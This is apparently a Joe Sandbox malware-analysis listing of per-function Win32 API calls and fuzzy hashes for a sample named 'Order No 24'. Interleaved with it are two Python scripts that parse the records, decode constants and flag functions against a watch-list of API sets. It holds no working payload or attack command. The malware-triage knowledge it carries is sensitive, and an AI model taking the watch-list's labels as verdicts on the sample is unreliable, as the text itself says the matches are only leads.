• Opcode ID: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
• Instruction ID: f2a2682d316aacb568e5340bac4da6a9c1d8c107f10af0a273b79beb82ab45f2
• Opcode Fuzzy Hash: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
• Instruction Fuzzy Hash: 0B118B7310650DBFEF268FD89C90EEABB6EFF19364F040105FA1552060C7329C629BA0
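The function records above (the token/SID sequence, the SendMessageW calls, the DefDlgProcW handler and the CreateWindowExW/GetStockObject/SendMessageW triple) are printed by Joe Sandbox as raw API names with hex arguments, which is tedious to read across hundreds of records. The following is an added example, not Joe Sandbox code and not part of this report: it parses the "APIs" / "Similarity" record layout into structured data, resolves the hex arguments the report leaves undecoded (0xB0 is EM_GETSEL, 0xC9 is EM_LINEFROMCHAR, 0x30 is WM_SETFONT, 0x11 is DEFAULT_GUI_FONT, GetTokenInformation class 2 is TokenGroups, all documented Win32 values) and applies a few behaviour labels over the API set. The record text in SAMPLE is a constructed excerpt trimmed from the records above; the signature names are my own.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Similarity" blocks) into
structured data and summarise what each function does with the Win32 API.
Added example, not Joe Sandbox code. SAMPLE is a constructed excerpt of the
report layout; CONSTANTS holds documented Win32 values."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three records trimmed to the lines the parser consumes.
SAMPLE = """\
APIs
  • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
  • Part of subcall function 009BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
• GetLengthSid.ADVAPI32(?,00000000,009BADE4,?,?), ref: 009BB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 009BB227
• HeapAlloc.KERNEL32(00000000), ref: 009BB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 009BB247
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Instruction Fuzzy Hash: 9611C172A00209EFCB04DF98DE85AEEB7BDEF94324F14842DE95297250D771AE45CB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 009BB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4AA
Memory Dump Source
Similarity
• API ID: MessageSend
• API String ID: 3850602802-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
• GetStockObject.GDI32(00000011), ref: 0099D1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
Similarity
• API ID: CreateMessageObjectSendStockWindow
• API String ID: 3970641297-0
"""

# (API, zero-based argument index) -> {raw value: symbolic name}; documented Win32 values.
CONSTANTS = {
    ("SendMessageW", 1): {0x30: "WM_SETFONT", 0xB0: "EM_GETSEL", 0xC9: "EM_LINEFROMCHAR"},
    ("DefDlgProcW", 1): {0x20: "WM_SETCURSOR"},
    ("GetTokenInformation", 1): {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges"},
    ("GetStockObject", 0): {17: "DEFAULT_GUI_FONT"},
}

# One API line: optional "Part of subcall function <addr>:" prefix, Name.MODULE, optional
# "(args)", optional "ref: <addr>". CRT lines such as "__lock.LIBCMT ref: ..." have no parens.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)
# Similarity keys worth keeping; "String ID" is often empty and is skipped.
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|API String ID|Instruction Fuzzy Hash|Opcode Fuzzy Hash):\s*(?P<val>\S+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[object]          # int for 8-hex-digit literals, "?" when Joe could not resolve it
    ref: Optional[str]          # address of the call site
    subcall_of: Optional[str]   # callee address when the line is "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall_of is None]

    def api_names(self) -> set:
        return {c.name for c in self.calls}


def _parse_args(raw: Optional[str]) -> List[object]:
    if not raw:
        return []
    out: List[object] = []
    for tok in raw.split(","):
        tok = tok.strip()
        out.append(int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok)
    return out


def parse_report(text: str) -> List[FunctionRecord]:
    """Each "APIs" header opens a new record; everything up to the next one belongs to it."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]), m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            current.fields[m["key"]] = m["val"]
    return records


def decode_constants(rec: FunctionRecord) -> List[str]:
    """Resolve numeric arguments Joe prints as raw hex into their Win32 names, in call order."""
    out = []
    for c in rec.calls:
        for (name, idx), table in CONSTANTS.items():
            if c.name == name and idx < len(c.args) and c.args[idx] in table:
                out.append(f"{name}({table[c.args[idx]]})")
    return out


def tag_behaviour(rec: FunctionRecord) -> List[str]:
    """Cheap behaviour labels over the API set; decoded constants disambiguate SendMessageW."""
    names = rec.api_names()
    decoded = decode_constants(rec)
    tags = []
    if {"GetTokenInformation", "GetLengthSid", "CopySid"} <= names:
        tags.append("token_group_sid_copy")   # size probe, allocate, copy a SID out of the token
    if any(d.startswith("SendMessageW(EM_") for d in decoded):
        tags.append("edit_control_query")     # edit-control messages, not a generic window send
    if {"CreateWindowExW", "GetStockObject"} <= names and "SendMessageW(WM_SETFONT)" in decoded:
        tags.append("gui_font_setup")
    return tags


if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE)):
        print(i, rec.fields.get("API String ID"), [c.name for c in rec.calls],
              decode_constants(rec), tag_behaviour(rec))
```

Feeding the full report text to parse_report works the same way; the "API String ID" field is the cheapest key to pivot on when comparing this report against other Joe Sandbox analyses, since it hashes the API set rather than the code bytes.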
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: a72d1a3ea0da921459526e574d5be0e0d00c2c308c89878973b0116e6701262f
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: 9A01493200014EBBCF125E84DE059EE3F67BB58360B598455FE2859132D336DAB2BB81
APIs
  • Part of subcall function 009A7A0D: __getptd_noexit.LIBCMT ref: 009A7A0E
• __lock.LIBCMT ref: 009A748F
• InterlockedDecrement.KERNEL32(?), ref: 009A74AC
• _free.LIBCMT ref: 009A74BF
• InterlockedIncrement.KERNEL32(01014598), ref: 009A74D7
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
• Opcode ID: 8005cf0778333b90c16e0f33bbd7e2cbe6e01c14fe831d27eb3b214f68419b88
• Instruction ID: e74b2aaa14292035a67d110b9218181065f38d888ae4fa3db5ad606e5371216c
• Opcode Fuzzy Hash: 8005cf0778333b90c16e0f33bbd7e2cbe6e01c14fe831d27eb3b214f68419b88
• Instruction Fuzzy Hash: F901D232909A21ABC712EFE59C0B75DFBB5BF4A721F148019F854A76A0CB345902CFD2
APIs
• __lock.LIBCMT ref: 009A7AD8
  • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
  • Part of subcall function 009A7CF4: EnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
• InterlockedIncrement.KERNEL32(?), ref: 009A7AE5
• __lock.LIBCMT ref: 009A7AF9
• ___addlocaleref.LIBCMT ref: 009A7B17
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1687444384-0
                                                                                                                                  • Opcode ID: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                                                                                                                  • Instruction ID: 2060e8d4f53595837c6f27dafcf16c8d905e1a0f476c30ec6d910970e583995f
                                                                                                                                  • Opcode Fuzzy Hash: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                                                                                                                  • Instruction Fuzzy Hash: 1F011B72504B00AED721DFA5D90674AF7F0AF91325F20890EA49A966A0CB74A645CB91
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009EE33D
                                                                                                                                  • _memset.LIBCMT ref: 009EE34C
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                                                                                                                  • CloseHandle.KERNEL32 ref: 009EE38D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3277943733-0
                                                                                                                                  • Opcode ID: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                                                                                                                  • Instruction ID: 4c8282847733270231fab82f021306d46b8531493b6c60fe1e2a371028820925
                                                                                                                                  • Opcode Fuzzy Hash: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                                                                                                                  • Instruction Fuzzy Hash: 70F089FB9403047EE71097E5AC45F777E6CD745758F104821FE04D61A2D3765D1146A4
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                                                                                                                    • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                                                                                                                    • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEA8E
                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 009EEA9B
                                                                                                                                  • EndPath.GDI32(00000000), ref: 009EEAAB
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 009EEAB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                  • Opcode ID: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                                                                                                                  • Instruction ID: ce6c54057da6545b9c731c934fd032dabd1ef74562250ddaabe3c31802f660dd
                                                                                                                                  • Opcode Fuzzy Hash: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                                                                                                                  • Instruction Fuzzy Hash: 68F05E36005259BBDB12DFD4AD09FCA3F19AF06311F044201FE16610E187759563CBD5
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009BC864
                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 009BC86B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                  • Opcode ID: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                                                                                                                  • Instruction ID: fa39a212f6e343e6303ca2b49bb08acb959305949c7853e68f49bb64065d0cee
                                                                                                                                  • Opcode Fuzzy Hash: 5319bfff1cd87094e9fee087ceb6bc1a682c4df15c146b1700d9d3aff3af5427
                                                                                                                                  • Instruction Fuzzy Hash: 1BE0657254122876DB109FE1DC0DEDB7F2CEF057B1F008011B50D85450D672C582C7E0
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 009BB0D6
                                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0DD
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009BAC9D), ref: 009BB0EA
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,009BAC9D), ref: 009BB0F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3974789173-0
                                                                                                                                  • Opcode ID: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                                                                                                                  • Instruction ID: a125e9d0d34c32da15f956ccb57fe7558b238093a233768674635b13d431ba57
                                                                                                                                  • Opcode Fuzzy Hash: 8fe105730060df5d54bcc8cd6ca8b71762dfd99319132c6f0ca271989b0964f3
                                                                                                                                  • Instruction Fuzzy Hash: 0DE086736012159BD720AFF15D0CB973BACEF557A1F018818F346DA080DB748403C761
                                                                                                                                  APIs
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 0099B496
                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0099B4A0
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0099B4B5
                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 0099B4BD
                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 009FDE2B
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 009FDE38
                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 009FDE51
                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 009FDE6A
                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 009FDE8A
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009FDE95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                  • Opcode ID: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                                                                                                                  • Instruction ID: a5beab6d52c2f7814ba63ba8e3090bd7f4542ae0ba328f32f8013e41a893c929
                                                                                                                                  • Opcode Fuzzy Hash: 6535d31997d93bf65d93f2080bdb60eacfbdda8451ba83be4beebfcc68cf40e5
                                                                                                                                  • Instruction Fuzzy Hash: B0E0ED32100248AAEF219BE8AC0DBE83F15AB55339F14C766FB6A580E1C7714592DB11
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                  • Opcode ID: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                                                                                                                  • Instruction ID: 0915a9110fad445a70ac9a25312ce5ffd8c4a5b75112acdfbd9809726df00e8e
                                                                                                                                  • Opcode Fuzzy Hash: 0d4fec64197882f63e21ff0636da70b1091052c8a15c0612a4ac14fb83b31080
                                                                                                                                  • Instruction Fuzzy Hash: 3DE04FB2100208EFDB009FF0C84866E7BA4EB4C351F11C809FD5A87210DB7998438B40
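Each block above is one function as the Joe Sandbox IDA plugin summarises it: the API calls it makes directly, calls reached through a callee (marked "Part of subcall function"), the memory dump the function was lifted from, and the similarity keys (API ID, opcode and instruction fuzzy hashes) used to match it against other samples. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses records in this layout, decodes the dwCreationFlags argument of a resolved CreateProcessW call (the 00000020 at call site 009EE37B above is NORMAL_PRIORITY_CLASS with no CREATE_SUSPENDED), and matches each function's direct API set against a small watch-list. The watch-list, group_key() and the sample input are assumptions of the example; group_key() is not the report's API ID, whose tokenisation the page does not document.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox IDA-plugin listing:
API set per function, CreateProcessW creation flags, and watch-list matches.
Added example, not Joe Sandbox code; it does not reproduce the report's API ID."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input in the page's layout (three records, hashes omitted).
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 009EE33D
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
• CloseHandle.KERNEL32 ref: 009EE38D
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
• GetCurrentThreadId.KERNEL32 ref: 009BC864
• AttachThreadInput.USER32(00000000), ref: 009BC86B
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BB2DF
• UnloadUserProfile.USERENV(?,?), ref: 009BB2EB
• CloseHandle.KERNEL32(?), ref: 009BB2F4
  • Part of subcall function 009BAB24: HeapFree.KERNEL32(00000000), ref: 009BAB32
"""

# One API line: optional "Part of subcall function <addr>:" prefix, Name.MODULE,
# optional "(args)", then "ref: <addr>". Key/value lines ("API ID: ...") match second.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                 # address of the call site
    args: Optional[str]      # argument list as printed; "?" marks an unresolved value
    subcall: Optional[str]   # callee address when the call happens inside a subcall

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self, direct_only=True):
        return {c.name for c in self.calls if not (direct_only and c.subcall)}

    def group_key(self):
        # Order-independent key for grouping identical records across reports.
        # This is an assumption of the example, not Joe Sandbox's "API ID".
        return "|".join(sorted(self.api_names(direct_only=False)))

def parse_records(text):
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # every record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.calls.append(ApiCall(m["name"], m["mod"], m["ref"], m["args"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.fields[m["key"].strip()] = m["val"].strip()
    return records

# dwCreationFlags bits (documented Win32 values); it is the 6th CreateProcessW argument.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x400: "CREATE_UNICODE_ENVIRONMENT",
                  0x08000000: "CREATE_NO_WINDOW"}

def creation_flags(rec):
    """Map each resolved CreateProcessW call site in a record to its decoded flag names."""
    out = {}
    for c in rec.calls:
        if c.name == "CreateProcessW" and c.args:
            raw = c.args.split(",")[5]
            if raw != "?":
                value = int(raw, 16)
                out[c.ref] = {n for bit, n in CREATION_FLAGS.items() if value & bit}
    return out

# Watch-list (an assumption of this example): direct API sets worth opening in IDA. Each is
# also used by ordinary runtime helpers, so a match is a lead to inspect, not a verdict.
WATCH = {"process creation": {"CreateProcessW"},
         "input-queue attach": {"AttachThreadInput", "GetWindowThreadProcessId"},
         "token access": {"OpenProcessToken", "OpenThreadToken"},
         "screen pixel read": {"GetWindowDC", "GetPixel"},
         "profile unload": {"WaitForSingleObject", "UnloadUserProfile"}}

def triage(records):
    """Return (label, lowest matching call-site address, API ID) per watch-list hit."""
    hits = []
    for rec in records:
        names = rec.api_names()
        for label, needed in WATCH.items():
            if needed <= names:
                first = min((c.ref for c in rec.calls if c.name in needed), key=lambda r: int(r, 16))
                hits.append((label, first, rec.fields.get("API ID", "")))
    return hits

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for label, ref, api_id in triage(recs):
        print(f"{label:20} @ {ref}  API ID={api_id or '-'}")
    print(creation_flags(recs[0]))
```

The watch-list is applied to direct calls only, so the HeapFree reached through subcall 009BAB24 does not pull the callee's behaviour into the caller's record; pass direct_only=False to api_names() when the question is reachability rather than what the function itself does. Every set in the watch-list is also consistent with the helpers of the AutoIt runtime the sample is built on (window activation, pixel reads, process launch), which is why a match is an address to open in the disassembly rather than a finding on its own.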
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BB2DF
                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 009BB2EB
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BB2F4
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BB2FC
                                                                                                                                    • Part of subcall function 009BAB24: GetProcessHeap.KERNEL32(00000000,?,009BA848), ref: 009BAB2B
                                                                                                                                    • Part of subcall function 009BAB24: HeapFree.KERNEL32(00000000), ref: 009BAB32
